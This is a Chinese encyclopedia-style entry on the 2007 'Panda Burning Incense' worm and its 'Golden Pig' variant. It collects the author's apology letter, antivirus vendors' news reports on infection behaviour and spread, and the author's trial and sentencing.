  最后就是关于我的身份,大家不要再猜测我是谁了,15岁的武汉男生也好,是个女的也好,某公司老总也好,杀毒厂商也好,光是新闻的评论,网友的臭骂已经让我后悔之极了!希望熊猫病毒不要再成为炒作的娱乐新闻,不要再出任何关于熊猫新闻和评论!希望安全软件公司,不要吹嘘,相互诋毁,相互炒作,尽力做出让人们信赖的好安全软件!谢谢大家!
  这是我写的一个专杀程序,肯定是比不上专业级的杀毒软件了,但是我想这是我最后能给大家做的事情了.
  熊猫走了,是结束吗?不是的,网络永远没有安全的时候,或许在不久,会有很多更厉害的病毒出来!所以我在这里提醒大家,提高网络安全意识,并不是你应该注意的,而是你必须懂得和去做的一些事情!
  再一次表示深深的歉意,同时我发出这个专杀,愿能给大家带来帮助!
  熊猫烧香的作者
  2007年2月9日于仙桃市第一看守所
【变种:金猪报喜】
  金猪报喜病毒实际就是最近熊猫烧香的新变种,
  春节将至,然而广大网络用户仍没有彻底摆脱“熊猫烧香”的阴霾。伴随着大量“熊猫烧香”变种的出现,对用户的危害一浪高过一浪。1月29日,来自金山毒霸反病毒中心最新消息:“熊猫烧香”化身“金猪”,危害指数再度升级,被感染的电脑中不但“熊猫”成群,而且“金猪”满圈。但象征财富的金猪仍然让用户无法摆脱“系统被破坏,大量应用软件无法应用”的噩梦。
  病毒描述:
  “武汉男生”,俗称“熊猫烧香”, 近日又化身为“金猪报喜” ,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成可爱金猪的模样。
  1月30日,江民科技反病毒中心监测到,肆虐互联网的“熊猫烧香”又出新变种。此次变种把“熊猫烧香”图案变成“金猪报喜”。江民反病毒专家提醒用户,春节临近,谨防春节期间病毒借人们互致祝福之际大面积爆发。
  专家介绍,“熊猫烧香”去年11月中旬被首次发现,短短两个月时间,新老变种已达700多种个,据江民反病毒预警中心监测到的数据显示,“熊猫烧香”病毒去年12月一举闯入病毒排名前20名,1月份更是有望进入前10名。疫情最严重的地区分别为:广东、山东、江苏、北京和辽宁。
  针对该病毒,江民杀毒软件KV系列已紧急升级,用户升级到最新病毒库即可有效防范该病毒于系统之外。江民“熊猫烧香”专杀工具已同步更新,未安装杀毒软件的用户可以登陆江民网站下载杀毒。此外,针对“熊猫烧香”变种频繁的特征,江民杀毒软件KV2007主动防御规则库可彻底防范“熊猫烧香”及其变种,用户可以登陆江民反病毒论坛(forum.jiangmin.com)下载使用。
  金山毒霸反病毒专家戴光剑指出,伴随着各大杀毒厂商对“熊猫烧香”病毒的集中绞杀,该病毒正在不断“繁衍”新的变种,密谋更加隐蔽的传播方式。据不完全统计,仅12月份至今,变种数已达90多个,个人用户感染熊猫烧香的已经高达几百万,企业用户感染数还在继续上升。
  此外学生寒假开始,上网人群短期内集中上升,病毒的传播速度也空前加快,所以用户在进行上网的过程中要更加警惕病毒的入侵。据了解,前几天在网络上出现了“熊猫烧香”作者声称不再有变种出现,而“金猪”的出现再次粉碎了人们的美梦,再次将人们拉回到熊猫烧香的梦魇之中。专家称,按照目前“熊猫烧香”破坏程度,威胁将延伸至春节。
  专家提醒大家,遇到“金猪”不要心慌,用熊猫烧香专杀工具就可以完全对付这只小金猪啦!
  熊猫烧香变身“金猪报喜”再作乱
  由于“熊猫烧香”病毒作者不断更新变种程序,众多杀毒软件无法跟随病毒的发展速度。
  “熊猫烧香”余毒未尽,新变种接踵而来。据悉,熊猫烧香已改头换面变成新病毒“金猪报喜”。日前,江民、瑞星、金山等反病毒公司已经陆续截获大量“金猪报喜”病毒的报告,而这一病毒甚至可以清除用户机器里原有的“熊猫烧香”病毒,并自动取而代之。
  由于“熊猫烧香”病毒作者不断更新变种程序,众多杀毒软件无法跟随病毒的发展速度。而近日出现的“金猪报喜”病毒图表,同样是可爱的小动物,但危害却在与“熊猫烧香”一样感染EXE文件外,还能感染RAR跟ZIP等格式文件。据悉目前几家反病毒厂商尚未推出针对“金猪报喜”的专杀工具。
  由于春节临近,更多新 病毒可能集中出现,因此反病毒专家提醒用户要加强警惕,及时升级 杀毒软件,不要随便点击莫名来历文件。
  最虔诚的病毒--熊猫烧香
  对于这个在06年给人们带来黑色记忆的病毒,其成因只因为作者为了炫耀自己而产生,其借助U盘的传播方式也引领新的反病毒课题,但这一切都没有其LOGO的熊猫给人的印象深刻,熊猫拿着三根香虔诚的祈祷什么?这给很多人以遐想。所以最虔诚的病毒只能颁给举着香在祈祷的熊猫。
  9月24日,“熊猫烧香”案一审宣判,主犯李俊被判刑4年。庭审中,李俊的辩护律师王万雄出示了一份某网络公司发给李俊的邀请函,请他担任公司的技术总监。据悉,案发后已有不下10家网络大公司跟李俊联系,欲以100万年薪邀请其加入(见9月25日《长江商报》)。
  熊猫烧香传播性极高,中病毒者会在短时间内传染局域网内其他用户!

相关词条:
新版熊猫烧香  
 
自定义分类:
互联网电脑病毒系统流氓软件
 
贡献者:
狂风暴雨
Copyright © 1999-2024 C114 All Rights Reserved | 联系我们 | 沪ICP备12002291号-4